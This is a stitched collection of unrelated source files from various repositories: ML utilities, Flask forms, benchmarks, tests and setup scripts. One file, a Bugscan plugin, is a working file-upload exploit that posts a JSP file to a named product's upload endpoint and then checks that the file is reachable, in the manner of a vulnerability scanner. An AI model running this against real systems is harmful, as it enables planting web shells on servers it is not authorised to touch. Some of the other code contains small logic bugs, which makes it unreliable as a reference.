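A sketch of wiring these hooks into a TF1.x training loop; the log directory, `iterator` and `train_op` are assumptions rather than part of the original file:

tf.train.get_or_create_global_step()                        # SummarySaverHook requires a global step
summary_hook = CustomSummarySaverHook(
    save_steps=100,
    output_dir='/tmp/tf-logs',                              # hypothetical log directory
    summary_op=tf.summary.merge_all())                      # assumes summaries were defined in the graph
init_hook = IteratorInitializerHook(
    func=lambda sess: sess.run(iterator.initializer))       # `iterator` assumed to be a tf.data iterator
with tf.train.MonitoredTrainingSession(hooks=[summary_hook, init_hook]) as sess:
    while not sess.should_stop():
        sess.run(train_op)                                  # `train_op` assumed to exist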
pyunitwizard/_private_tools/parsers.py | uibcdf/pyunitwizard | 0 | 6910 | <filename>pyunitwizard/_private_tools/parsers.py
parsers = ['openmm.unit', 'pint', 'unyt']
def digest_parser(parser: str) -> str:
""" Check if parser is correct."""
if parser is not None:
if parser.lower() in parsers:
return parser.lower()
else:
raise ValueError
else:
from pyunitwizard.kernel import default_parser
return default_parser
| 2.71875 | 3 |
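Expected behaviour of the helper above:

digest_parser('Pint')        # -> 'pint' (case-insensitive match against the parsers list)
digest_parser(None)          # -> falls back to pyunitwizard.kernel.default_parser
digest_parser('astropy')     # -> raises ValueError: not one of ['openmm.unit', 'pint', 'unyt']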
metric_wsd/utils/data_utils.py | bartonlin/MWSD | 4 | 6911 | '''
Copyright (c) Facebook, Inc. and its affiliates.
All rights reserved.
This source code is licensed under the license found in the
LICENSE file in the root directory of this source tree.
Code taken from: https://github.com/facebookresearch/wsd-biencoders/blob/master/wsd_models/util.py
'''
import os
import re
import torch
import subprocess
from transformers import *
import random
pos_converter = {'NOUN':'n', 'PROPN':'n', 'VERB':'v', 'AUX':'v', 'ADJ':'a', 'ADV':'r'}
def generate_key(lemma, pos):
if pos in pos_converter.keys():
pos = pos_converter[pos]
key = '{}+{}'.format(lemma, pos)
return key
def load_pretrained_model(name):
if name == 'roberta-base':
model = RobertaModel.from_pretrained('roberta-base')
hdim = 768
elif name == 'roberta-large':
model = RobertaModel.from_pretrained('roberta-large')
hdim = 1024
elif name == 'bert-large':
model = BertModel.from_pretrained('bert-large-uncased')
hdim = 1024
else: #bert base
model = BertModel.from_pretrained('bert-base-uncased')
hdim = 768
return model, hdim
def load_tokenizer(name):
if name == 'roberta-base':
tokenizer = RobertaTokenizer.from_pretrained('roberta-base')
elif name == 'roberta-large':
tokenizer = RobertaTokenizer.from_pretrained('roberta-large')
elif name == 'bert-large':
tokenizer = BertTokenizer.from_pretrained('bert-large-uncased')
else: #bert base
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
return tokenizer
def load_wn_senses(path):
wn_senses = {}
with open(path, 'r', encoding="utf8") as f:
for line in f:
line = line.strip().split('\t')
lemma = line[0]
pos = line[1]
senses = line[2:]
key = generate_key(lemma, pos)
wn_senses[key] = senses
return wn_senses
def get_label_space(data):
#get set of labels from dataset
labels = set()
for sent in data:
for _, _, _, _, label in sent:
if label != -1:
labels.add(label)
labels = list(labels)
labels.sort()
labels.append('n/a')
label_map = {}
for sent in data:
for _, lemma, pos, _, label in sent:
if label != -1:
key = generate_key(lemma, pos)
label_idx = labels.index(label)
if key not in label_map: label_map[key] = set()
label_map[key].add(label_idx)
return labels, label_map
def process_encoder_outputs(output, mask, as_tensor=False):
combined_outputs = []
position = -1
avg_arr = []
for idx, rep in zip(mask, torch.split(output, 1, dim=0)):
#ignore unlabeled words
if idx == -1: continue
#average representations for units in same example
elif position < idx:
position=idx
if len(avg_arr) > 0: combined_outputs.append(torch.mean(torch.stack(avg_arr, dim=-1), dim=-1))
avg_arr = [rep]
else:
assert position == idx
avg_arr.append(rep)
#get last example from avg_arr
if len(avg_arr) > 0: combined_outputs.append(torch.mean(torch.stack(avg_arr, dim=-1), dim=-1))
if as_tensor: return torch.cat(combined_outputs, dim=0)
else: return combined_outputs
#run WSD Evaluation Framework scorer within python
def evaluate_output(scorer_path, gold_filepath, out_filepath):
eval_cmd = ['java','-cp', scorer_path, 'Scorer', gold_filepath, out_filepath]
output = subprocess.Popen(eval_cmd, stdout=subprocess.PIPE ).communicate()[0]
output = [x.decode("utf-8") for x in output.splitlines()]
p,r,f1 = [float(output[i].split('=')[-1].strip()[:-1]) for i in range(3)]
return p, r, f1
def load_data(datapath, name):
text_path = os.path.join(datapath, '{}.data.xml'.format(name))
gold_path = os.path.join(datapath, '{}.gold.key.txt'.format(name))
#load gold labels
gold_labels = {}
with open(gold_path, 'r', encoding="utf8") as f:
for line in f:
line = line.strip().split(' ')
instance = line[0]
#this means we are ignoring other senses if labeled with more than one
#(happens at least in SemCor data)
key = line[1]
gold_labels[instance] = key
#load train examples + annotate sense instances with gold labels
sentences = []
s = []
with open(text_path, 'r', encoding="utf8") as f:
for line in f:
line = line.strip()
if line == '</sentence>':
sentences.append(s)
s=[]
elif line.startswith('<instance') or line.startswith('<wf'):
word = re.search('>(.+?)<', line).group(1)
lemma = re.search('lemma="(.+?)"', line).group(1)
pos = re.search('pos="(.+?)"', line).group(1)
#clean up data
word = re.sub('&apos;', '\'', word)
lemma = re.sub('&apos;', '\'', lemma)
sense_inst = -1
sense_label = -1
if line.startswith('<instance'):
sense_inst = re.search('instance id="(.+?)"', line).group(1)
#annotate sense instance with gold label
sense_label = gold_labels[sense_inst]
s.append((word, lemma, pos, sense_inst, sense_label))
return sentences
#normalize ids list, masks to whatever the passed in length is
def normalize_length(ids, attn_mask, o_mask, max_len, pad_id):
if max_len == -1:
return ids, attn_mask, o_mask
else:
if len(ids) < max_len:
while len(ids) < max_len:
ids.append(torch.tensor([[pad_id]]))
attn_mask.append(0)
o_mask.append(-1)
else:
ids = ids[:max_len-1]+[ids[-1]]
attn_mask = attn_mask[:max_len]
o_mask = o_mask[:max_len]
assert len(ids) == max_len
assert len(attn_mask) == max_len
assert len(o_mask) == max_len
return ids, attn_mask, o_mask
#filters down training dataset to (up to) k examples per sense
#for few-shot learning of the model
def filter_k_examples(data, k):
#shuffle data so we don't only get examples for (common) senses from beginning
random.shuffle(data)
#track number of times sense from data is used
sense_dict = {}
#store filtered data
filtered_data = []
example_count = 0
for sent in data:
filtered_sent = []
for form, lemma, pos, inst, sense in sent:
#treat unlabeled words normally
if sense == -1:
x = (form, lemma, pos, inst, sense)
elif sense in sense_dict:
if sense_dict[sense] < k:
#increment sense count and add example to filtered data
sense_dict[sense] += 1
x = (form, lemma, pos, inst, sense)
example_count += 1
else: #if the data already has k examples of this sense
#add example with no instance or sense label to data
x = (form, lemma, pos, -1, -1)
else:
#add labeled example to filtered data and sense dict
sense_dict[sense] = 1
x = (form, lemma, pos, inst, sense)
example_count += 1
filtered_sent.append(x)
filtered_data.append(filtered_sent)
print("k={}, training on {} sense examples...".format(k, example_count))
return filtered_data
#EOF
| 1.664063 | 2 |
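A small illustration of the lemma+POS key format used throughout the module above; the sense-inventory path is a hypothetical example:

generate_key('run', 'VERB')    # -> 'run+v'  (POS collapsed via pos_converter)
generate_key('dog', 'NOUN')    # -> 'dog+n'
generate_key('dog', 'n')       # -> 'dog+n'  (already-normalized tags pass through)
# wn_senses = load_wn_senses('wordnet/index.sense.tsv')   # tab-separated: lemma, pos, sense keys...
# wn_senses['dog+n']                                      # candidate WordNet sense keys for this key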
examples/dehydrogenation/3-property-mappings/mappings_from_ontology/run_w_onto.py | TorgeirUstad/dlite | 0 | 6912 | #!/usr/bin/env python3
from typing import Dict, AnyStr
from pathlib import Path
from ontopy import get_ontology
import dlite
from dlite.mappings import make_instance
# Setup dlite paths
thisdir = Path(__file__).parent.absolute()
rootdir = thisdir.parent.parent
workflow1dir = rootdir / '1-simple-workflow'
entitiesdir = rootdir / 'entities'
atomdata = workflow1dir / 'atomscaledata.json'
dlite.storage_path.append(f'{entitiesdir}/*.json')
# Define the calculation
def get_energy(reaction):
"""Calculates reaction energies with data from Substance entity
data is harvested from collection and mapped to Substance according to
mappings.
Args:
reaction: dict with names of reactants and products ase keys
and stochiometric coefficient as value
Negative stochiometric coefficients for reactants.
Positive stochiometric coefficients for products.
Returns:
reaction energy
"""
energy = 0
for label, n in reaction.items():
inst = make_instance(Substance, coll[label], mappings,
mapsTo=mapsTo)
energy += n * inst.molecule_energy
return energy
# Import ontologies with mappings
molecules_onto = get_ontology(f'{thisdir}/mapping_mols.ttl').load()
reaction_onto = get_ontology(f'{thisdir}/mapping_substance.ttl').load()
# Convert to mappings to a single list of triples
mappings = list(molecules_onto.get_unabbreviated_triples())
mappings.extend(list(reaction_onto.get_unabbreviated_triples()))
# Obtain the Metadata to be mapped to each other
Molecule = dlite.get_instance('http://onto-ns.com/meta/0.1/Molecule')
Substance = dlite.get_instance('http://onto-ns.com/meta/0.1/Substance')
# Find mapping relation
# TODO: investigate what to do if the two cases
# use a different mappings relation. As of now it is a
# hard requirement that they use the same.
mapsTo = molecules_onto.mapsTo.iri
# Define where the molecule data is obtained from
# This is a dlite collection
coll = dlite.Collection(f'json://{atomdata}?mode=r#molecules', 0)
# input from chemical engineer, e.g. what are reactants and products
# reactants (left side of equation) have negative stochiometric coefficient
# products (right side of equation) have positive stochiometric coefficient
reaction1 = {'C2H6':-1, 'C2H4':1,'H2':1}
reaction_energy = get_energy(reaction1)
print('Reaction energy 1', reaction_energy)
reaction2 = {'C3H8':-1, 'H2': -2,'CH4':3}
reaction_energy2 = get_energy(reaction2)
print('Reaction energy 2', reaction_energy2)
# Map instance Molecule with label 'H2' to Substance
#inst = make_instance(Substance, coll['H2'], mappings)
#print(inst)
# Map instance Molecule with label 'H2' to itself
#inst2 = make_instance(Molecule, coll['H2'], mappings, strict=False)
#print(inst2)
| 2.640625 | 3 |
forms.py | lendoo73/my_idea_boxes | 0 | 6913 | <filename>forms.py<gh_stars>0
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField
from wtforms.fields.html5 import DateField, IntegerField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange
from models import Colleagues, Admins, Boxes, Ideas
class RegistrationFormCompany(FlaskForm):
company_name = StringField("Company name", validators = [DataRequired()])
user_name = StringField("Your User name", validators = [DataRequired()])
first_name = StringField("Your First name", validators = [DataRequired()])
last_name = StringField("Your Last name", validators = [DataRequired()])
position = StringField("Your Position", validators = [DataRequired()])
email = StringField("Email", validators = [DataRequired(), Email()])
founder_password = PasswordField("<PASSWORD>", validators = [DataRequired()])
repeat_founder_password = PasswordField(
"Repeat Your Password",
validators = [DataRequired(),
EqualTo("founder_password")]
)
joining_password = PasswordField("<PASSWORD>", validators = [DataRequired()])
repeat_joining_password = PasswordField(
"Repeat Joining Password",
validators = [DataRequired(),
EqualTo("joining_password")]
)
submit = SubmitField("Register your Company")
class RegistrationFormColleague(FlaskForm):
company_name = StringField("Company name", validators = [DataRequired()])
joining_password = PasswordField("<PASSWORD>", validators = [DataRequired()])
user_name = StringField("Your User name", validators = [DataRequired()])
email = StringField("Email", validators = [DataRequired(), Email()])
first_name = StringField("Your First name", validators = [DataRequired()])
last_name = StringField("Your Last name", validators = [DataRequired()])
position = StringField("Your Position", validators = [DataRequired()])
password = PasswordField("Your Password", validators = [DataRequired()])
repeat_password = PasswordField(
"Repeat Password",
validators = [DataRequired(),
EqualTo("password")]
)
submit = SubmitField("Register")
class LoginForm(FlaskForm):
email_or_user_name = StringField("Email or User name", validators = [DataRequired()])
password = PasswordField("Password", validators = [DataRequired()])
remember_me = BooleanField("Remember Me")
submit = SubmitField("Sign In")
class ConfirmEmailForm(FlaskForm):
email = HiddenField("Email")
code = IntegerField(
"Confirmation code",
validators = [
DataRequired(),
NumberRange(
min = 100000,
max = 999999,
message = "Please enter the 6 digits you received in the email."
)
]
)
submit = SubmitField("Confirm my Email")
class UpdateFirstNameForm(FlaskForm):
first_name = StringField("First Name", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdateLastNameForm(FlaskForm):
last_name = StringField("Last Name", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdateEmailForm(FlaskForm):
email = StringField("Email", validators = [DataRequired(), Email()])
password = PasswordField("Password", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdatePositionForm(FlaskForm):
position = StringField("Your Position", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdatePasswordForm(FlaskForm):
password = PasswordField("<PASSWORD>", validators = [DataRequired()])
new_password = PasswordField("<PASSWORD>", validators = [DataRequired()])
repeat_new_password = PasswordField(
"Repeat your New Password",
validators = [DataRequired(),
EqualTo("repeat_new_password")]
)
submit = SubmitField("Update")
allowed_format = ['png', 'svg', 'jpg', "jpeg"]
class UpdateAvatarForm(FlaskForm):
avatar = FileField(
"Choose an Avatar:",
validators = [
FileRequired(),
FileAllowed(allowed_format, f"Wrong format! Allowed: {allowed_format}.")
]
)
submit = SubmitField("Upload Avatar")
class DeleteColleagueForm(FlaskForm):
password = PasswordField("Your Password", validators = [DataRequired()])
submit = SubmitField("Delete Registration")
class UpdateLogoForm(FlaskForm):
logo = FileField(
"Choose your Company Logo:",
validators = [
FileRequired(),
FileAllowed(allowed_format, f"Wrong format! Allowed: {allowed_format}.")
]
)
submit = SubmitField("Upload Logo")
class UpdateCompanyNameForm(FlaskForm):
company_name = StringField("Company Name", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdateJoiningPasswordForm(FlaskForm):
password = PasswordField("<PASSWORD>", validators = [DataRequired()])
new_password = PasswordField("New Joining Password", validators = [DataRequired()])
repeat_new_password = PasswordField(
"Repeat New Password",
validators = [DataRequired(),
EqualTo("repeat_new_password")]
)
submit = SubmitField("Update")
class UpdatePrivilegsForm(FlaskForm):
update_company = BooleanField("Update Company")
update_privilegs = BooleanField("Update Privilegs")
update_colleague = BooleanField("Update Colleague")
update_box = BooleanField("Update Idea Box")
password = PasswordField("<PASSWORD>", validators = [DataRequired()])
submit = SubmitField("Update Privilegs")
class CreateBoxForm(FlaskForm):
name = StringField("Title", validators = [DataRequired()])
description = TextAreaField("Description", validators = [DataRequired()])
close_at = DateField("Close at", format = "%Y-%m-%d")
submit = SubmitField("Create Box")
class CreateIdeaForm(FlaskForm):
idea = TextAreaField("My Idea", validators= [DataRequired()])
sign = RadioField(
"Sign",
choices = [
("incognito", "incognito"),
("username", "username"),
("first name", "first name"),
("full name", "full name")
]
)
submit = SubmitField("Share my Idea") | 2.65625 | 3 |
5.analysis/scikit-multilearn-master/skmultilearn/adapt/brknn.py | fullmooncj/textmining_edu | 0 | 6914 | <reponame>fullmooncj/textmining_edu<filename>5.analysis/scikit-multilearn-master/skmultilearn/adapt/brknn.py
from builtins import range
from ..base import MLClassifierBase
from ..utils import get_matrix_in_format
from sklearn.neighbors import NearestNeighbors
import scipy.sparse as sparse
import numpy as np
class BinaryRelevanceKNN(MLClassifierBase):
"""Binary Relevance adapted kNN Multi-Label Classifier."""
def __init__(self, k = 10):
super(BinaryRelevanceKNN, self).__init__()
self.k = k # Number of neighbours
self.copyable_attrs = ['k']
def fit(self, X, y):
"""Fit classifier with training data
Internally this method uses a sparse CSC representation for y
(:py:class:`scipy.sparse.csc_matrix`).
:param X: input features
:type X: dense or sparse matrix (n_samples, n_features)
:param y: binary indicator matrix with label assignments
:type y: dense or sparse matrix of {0, 1} (n_samples, n_labels)
:returns: Fitted instance of self
"""
self.train_labelspace = get_matrix_in_format(y, 'csc')
self.num_instances = self.train_labelspace.shape[0]
self.num_labels = self.train_labelspace.shape[1]
self.knn = NearestNeighbors(self.k).fit(X)
return self
def compute_confidences(self):
# % of neighbours that have a given label assigned
# sum over each label columns after subsetting for neighbours
# and normalize
self.confidences = np.vstack([self.train_labelspace[n,:].tocsc().sum(axis=0) / float(self.num_labels) for n in self.neighbors])
return self.confidences
def predict(self, X):
"""Predict labels for X
:param X: input features
:type X: dense or sparse matrix (n_samples, n_features)
:returns: binary indicator matrix with label assignments
:rtype: sparse matrix of int (n_samples, n_labels)
"""
self.neighbors = self.knn.kneighbors(X, self.k, return_distance=False)
self.compute_confidences()
return self.predict_variant(X)
class BRkNNaClassifier(BinaryRelevanceKNN):
"""Binary Relevance multi-label classifier based on k Nearest Neighbours method.
This version of the classifier assigns the labels that are assigned to at least half of the neighbors.
:param int k: number of neighbors
"""
def predict_variant(self, X):
# TODO: find out if moving the sparsity to compute confidences boots speed
return sparse.csr_matrix(np.rint(self.confidences), dtype='i8')
class BRkNNbClassifier(BinaryRelevanceKNN):
"""Binary Relevance multi-label classifier based on k Nearest Neighbours method.
This version of the classifier assigns the most popular m labels of the neighbors, where m is the
average number of labels assigned to the object's neighbors.
:param int k: number of neighbors
"""
def predict_variant(self, X):
self.avg_labels = [int(np.average(self.train_labelspace[n,:].sum(axis=1)).round()) for n in self.neighbors]
prediction = sparse.lil_matrix((X.shape[0], self.num_labels), dtype='i8')
top_labels = np.argpartition(self.confidences, kth=min(self.avg_labels, len(self.confidences[0])), axis=1).tolist()
for i in range(X.shape[0]):
for j in top_labels[i][-self.avg_labels[i]:]:
prediction[i,j] += 1
return prediction
| 2.75 | 3 |
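A usage sketch for `BRkNNaClassifier`, assuming dense feature arrays and a binary indicator label matrix as described in the docstrings:

import numpy as np
from scipy import sparse

X_train = np.random.rand(100, 20)                                        # toy data: 100 samples, 20 features
y_train = sparse.csr_matrix((np.random.rand(100, 5) > 0.7).astype(int))  # binary indicator matrix, 5 labels
X_test = np.random.rand(10, 20)

clf = BRkNNaClassifier(k=5)            # a label is assigned if at least half of the 5 neighbours carry it
clf.fit(X_train, y_train)
predictions = clf.predict(X_test)      # sparse (10, 5) indicator matrix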
groclient/constants.py | eric-gro/api-client | 18 | 6915 | """Constants about the Gro ontology that can be imported and re-used anywhere."""
REGION_LEVELS = {
'world': 1,
'continent': 2,
'country': 3,
'province': 4, # Equivalent to state in the United States
'district': 5, # Equivalent to county in the United States
'city': 6,
'market': 7,
'other': 8,
'coordinate': 9
}
ENTITY_TYPES_PLURAL = ['metrics', 'items', 'regions', 'frequencies', 'sources', 'units']
DATA_SERIES_UNIQUE_TYPES_ID = [
'metric_id',
'item_id',
'region_id',
'partner_region_id',
'frequency_id',
'source_id'
]
ENTITY_KEY_TO_TYPE = {
'metric_id': 'metrics',
'item_id': 'items',
'region_id': 'regions',
'partner_region_id': 'regions',
'source_id': 'sources',
'frequency_id': 'frequencies',
'unit_id': 'units'
}
DATA_POINTS_UNIQUE_COLS = DATA_SERIES_UNIQUE_TYPES_ID + [
'reporting_date',
'start_date',
'end_date'
]
| 1.679688 | 2 |
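Typical lookups these constants support:

REGION_LEVELS['province']                  # -> 4, the state-equivalent level
ENTITY_KEY_TO_TYPE['partner_region_id']    # -> 'regions'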
asv_bench/benchmarks/tslibs/period.py | CitizenB/pandas | 6 | 6916 | """
Period benchmarks that rely only on tslibs. See benchmarks.period for
Period benchmarks that rely on other parts fo pandas.
"""
from pandas import Period
from pandas.tseries.frequencies import to_offset
class PeriodProperties:
params = (
["M", "min"],
[
"year",
"month",
"day",
"hour",
"minute",
"second",
"is_leap_year",
"quarter",
"qyear",
"week",
"daysinmonth",
"dayofweek",
"dayofyear",
"start_time",
"end_time",
],
)
param_names = ["freq", "attr"]
def setup(self, freq, attr):
self.per = Period("2012-06-01", freq=freq)
def time_property(self, freq, attr):
getattr(self.per, attr)
class PeriodUnaryMethods:
params = ["M", "min"]
param_names = ["freq"]
def setup(self, freq):
self.per = Period("2012-06-01", freq=freq)
def time_to_timestamp(self, freq):
self.per.to_timestamp()
def time_now(self, freq):
self.per.now(freq)
def time_asfreq(self, freq):
self.per.asfreq("A")
class PeriodConstructor:
params = [["D"], [True, False]]
param_names = ["freq", "is_offset"]
def setup(self, freq, is_offset):
if is_offset:
self.freq = to_offset(freq)
else:
self.freq = freq
def time_period_constructor(self, freq, is_offset):
Period("2012-06-01", freq=freq)
| 2.6875 | 3 |
Bugscan_exploits-master/exp_list/exp-1788.py | csadsl/poc_exp | 11 | 6917 | <reponame>csadsl/poc_exp
#/usr/bin/python
#-*- coding: utf-8 -*-
#Refer http://www.wooyun.org/bugs/wooyun-2015-0137140
#__Author__ = 上善若水
#_PlugName_ = whezeip Plugin
#_FileName_ = whezeip.py
def assign(service, arg):
if service == "whezeip":
return True, arg
def audit(arg):
raw = '''
POST /defaultroot/customize/formClassUpload.jsp?flag=1&returnField=null HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: 127.0.0.1/defaultroot/customize/formClassUpload.jsp
Cookie: LocLan=zh_cn; JSESSIONID=zXP1WqCc0h80FSvJNVdnj1fGpTJfh2GphR5GYJnJGLLKKKtJdGJN!-668245681
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------11327923318636
Content-Length: 328
-----------------------------11327923318636
Content-Disposition: form-data; name="photo"; filename="testvul.jsp"
Content-Type: application/octet-stream
testvul_uploadfile_test
-----------------------------11327923318636
Content-Disposition: form-data; name="submit"
上传
-----------------------------11327923318636--
'''
url = arg + 'defaultroot/customize/formClassUpload.jsp?flag=1&returnField=null'
# proxy=('127.0.0.1',1234)
# code, head,res, errcode, _ = curl.curl2(url,proxy=proxy,raw=raw)
code1, head1, res1, errcode1, _url1 = curl.curl2(url,raw=raw)
shell_path = 'defaultroot/devform/customize/' + 'testvul.jsp'
code2, head2, res2, errcode2, _url2 = curl.curl2(arg+shell_path)
if code2 == 200 and 'testvul_uploadfile_test' in res2:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('whezeip', 'http://172.16.31.10:7001/')[1])
| 1.789063 | 2 |
3-working-with-lists/zip_tuples.py | thecodingsim/learn-python | 0 | 6918 | <reponame>thecodingsim/learn-python
# Use zip() to create a new variable called names_and_dogs_names that combines owners and dogs_names lists into a zip object.
# Then, create a new variable named list_of_names_and_dogs_names by calling the list() function on names_and_dogs_names.
# Print list_of_names_and_dogs_names.
owners = ["Jenny", "Alexus", "Sam", "Grace"]
dogs_names = ["Elphonse", "Dr. Doggy DDS", "Carter", "Ralph"]
names_and_dogs_names = zip(owners, dogs_names)
list_of_names_and_dogs_names = list(names_and_dogs_names)
print(list_of_names_and_dogs_names)
| 4.4375 | 4 |
setup.py | abhiomkar/couchdbkit | 1 | 6919 | # -*- coding: utf-8 -
#
# This file is part of couchdbkit released under the MIT license.
# See the NOTICE for more information.
import os
import sys
if not hasattr(sys, 'version_info') or sys.version_info < (2, 5, 0, 'final'):
raise SystemExit("couchdbkit requires Python 2.5 or later.")
from setuptools import setup, find_packages
from couchdbkit import __version__
setup(
name = 'couchdbkit',
version = __version__,
description = 'Python couchdb kit',
long_description = file(
os.path.join(
os.path.dirname(__file__),
'README.rst'
)
).read(),
author = '<NAME>',
author_email = '<EMAIL>',
license = 'Apache License 2',
url = 'http://couchdbkit.org',
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Database',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries :: Python Modules',
],
packages = find_packages(exclude=['tests']),
zip_safe = False,
install_requires = [
'restkit>=3.2',
],
entry_points="""
[couchdbkit.consumers]
sync=couchdbkit.consumer.sync:SyncConsumer
eventlet=couchdbkit.consumer.ceventlet:EventletConsumer
gevent=couchdbkit.consumer.cgevent:GeventConsumer
""",
test_suite='noses',
)
| 1.445313 | 1 |
tests/integration/test_infrastructure_persistence.py | othercodes/sample-todo-list-hexagonal-achitecture | 0 | 6920 | <reponame>othercodes/sample-todo-list-hexagonal-achitecture<gh_stars>0
from typing import Optional
from complexheart.domain.criteria import Criteria
from sqlalchemy import create_engine
from sqlalchemy.engine import Engine
from sqlalchemy.orm import sessionmaker
from to_do_list.tasks.domain.models import Task
from to_do_list.tasks.infrastructure.persistence.relational import RelationalTaskRepository, DBInstaller
db_engine: Optional[Engine] = None
def setup_function():
global db_engine
db_engine = create_engine('sqlite:///:memory:')
DBInstaller(db_engine).install()
def test_repository_should_save_new_task_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
task = repository.save(task_factory({}))
assert session.query(Task).get(task.id)
def test_repository_should_find_task_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
task = repository.save(task_factory({}))
assert repository.find(task.id)
def test_repository_should_match_task_by_criteria_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
for i in range(11):
repository.save(task_factory({'description': 'My task {i}'.format(i=i)}))
tasks = repository.match(
Criteria() \
.filter('description', 'like', '%task 1%') \
.order_by(['id'])
)
for task in tasks:
assert isinstance(task, Task)
assert len(tasks) == 2
def test_repository_should_get_all_tasks_successfully(task_factory):
session = sessionmaker(bind=db_engine)()
repository = RelationalTaskRepository(session)
for i in range(10):
repository.save(task_factory({'description': 'My task {i}'.format(i=i)}))
tasks = repository.all()
for task in tasks:
assert isinstance(task, Task)
assert len(tasks) == 10
| 2.09375 | 2 |
wagtail_jinja2/extensions.py | minervaproject/wagtail-jinja2-extensions | 6 | 6921 | <filename>wagtail_jinja2/extensions.py
from jinja2.ext import Extension
from jinja2 import nodes
from jinja2 import Markup
from wagtail.wagtailadmin.templatetags.wagtailuserbar import wagtailuserbar as original_wagtailuserbar
from wagtail.wagtailimages.models import Filter, SourceImageIOError
class WagtailUserBarExtension(Extension):
tags = set(['wagtailuserbar'])
def parse(self, parser):
call = self.call_method('_render', args=[nodes.ContextReference()])
return nodes.Output([nodes.MarkSafe(call)]).set_lineno(next(parser.stream).lineno)
def _render(self, context):
return Markup(original_wagtailuserbar(context))
class WagtailImagesExtension(Extension):
tags = set(['image'])
def parse(self, parser):
lineno = next(parser.stream).lineno
image_expr = parser.parse_expression()
filter_spec = parser.parse_expression()
if parser.stream.skip_if('name:as'):
output_var_name = parser.parse_expression()
output_var_name = nodes.Const(output_var_name.name)
else:
output_var_name = nodes.Const(None)
if output_var_name.value is not None:
return nodes.Assign(nodes.Name(output_var_name.value, 'store'),
self.call_method('_render', [image_expr, filter_spec, output_var_name]))
else:
return nodes.Output([
self.call_method('_render', [image_expr, filter_spec, output_var_name])
]).set_lineno(lineno)
def filter(self, filter_spec):
_filter, _ = Filter.objects.get_or_create(spec=filter_spec)
return _filter
def _render(self, image, filter_spec, output_var_name=None):
if not image:
return ''
try:
rendition = image.get_rendition(self.filter(filter_spec))
except SourceImageIOError:
# It's fairly routine for people to pull down remote databases to their
# local dev versions without retrieving the corresponding image files.
# In such a case, we would get a SourceImageIOError at the point where we try to
# create the resized version of a non-existent image. Since this is a
# bit catastrophic for a missing image, we'll substitute a dummy
# Rendition object so that we just output a broken link instead.
Rendition = image.renditions.model # pick up any custom Image / Rendition classes that may be in use
rendition = Rendition(image=image, width=0, height=0)
rendition.file.name = 'not-found'
if output_var_name:
# store the rendition object in the given variable
return rendition
else:
# render the rendition's image tag now
# resolved_attrs = {}
# for key in self.attrs:
# resolved_attrs[key] = self.attrs[key].resolve(context)
return rendition.img_tag({})
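# Usage sketch for the two tags above (hedged: assumes these extensions are
# registered in the Jinja2 environment's extensions list and that `page.photo`
# is a Wagtail image -- both names are illustrative):
#
#   {% wagtailuserbar %}
#   {% image page.photo "fill-320x240" %}
#   {% image page.photo "width-400" as photo %}
#   <img src="{{ photo.url }}" width="{{ photo.width }}" height="{{ photo.height }}">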
| 2.125 | 2 |
rta/provision/__init__.py | XiaoguTech/rta-sandbox | 0 | 6922 | from rta.provision.utils import *
from rta.provision.passwd import *
from rta.provision.influxdb import *
from rta.provision.grafana import *
from rta.provision.kapacitor import *
| 1.0625 | 1 |
nn_dataflow/tests/unit_test/test_network.py | Pingziwalk/nn_dataflow | 170 | 6923 | """ $lic$
Copyright (C) 2016-2020 by Tsinghua University and The Board of Trustees of
Stanford University
This program is free software: you can redistribute it and/or modify it under
the terms of the Modified BSD-3 License as published by the Open Source
Initiative.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the BSD-3 License for more details.
You should have received a copy of the Modified BSD-3 License along with this
program. If not, see <https://opensource.org/licenses/BSD-3-Clause>.
"""
import unittest
from nn_dataflow.core import Network
from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, \
PoolingLayer, EltwiseLayer
class TestNetwork(unittest.TestCase):
''' Tests for Network. '''
# pylint: disable=too-many-public-methods
def setUp(self):
''' Set up. '''
self.network = Network('test_net')
self.network.set_input_layer(InputLayer(3, 224))
self.network.add('c1', ConvLayer(3, 64, 224, 3))
self.network.add('p1', PoolingLayer(64, 7, 32))
self.network.add('f1', FCLayer(64, 1000, 7))
def test_set_input_layer(self):
''' Modifier set_input_layer. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 24))
self.assertIsInstance(network.input_layer(), InputLayer)
self.assertEqual(network.input_layer().nofm, 3)
self.assertEqual(network.input_layer().hofm, 24)
self.assertEqual(network.input_layer().wofm, 24)
self.assertEqual(len(network), 0)
def test_set_input_layer_type(self):
''' Modifier set_input_layer type. '''
network = Network('test_net')
with self.assertRaisesRegex(TypeError, 'Network: .*input_layer.*'):
network.set_input_layer(Layer(3, 24))
with self.assertRaisesRegex(TypeError, 'Network: .*input_layer.*'):
network.set_input_layer(ConvLayer(3, 8, 24, 3))
def test_set_input_layer_duplicate(self):
''' Modifier set_input_layer duplicate. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 24))
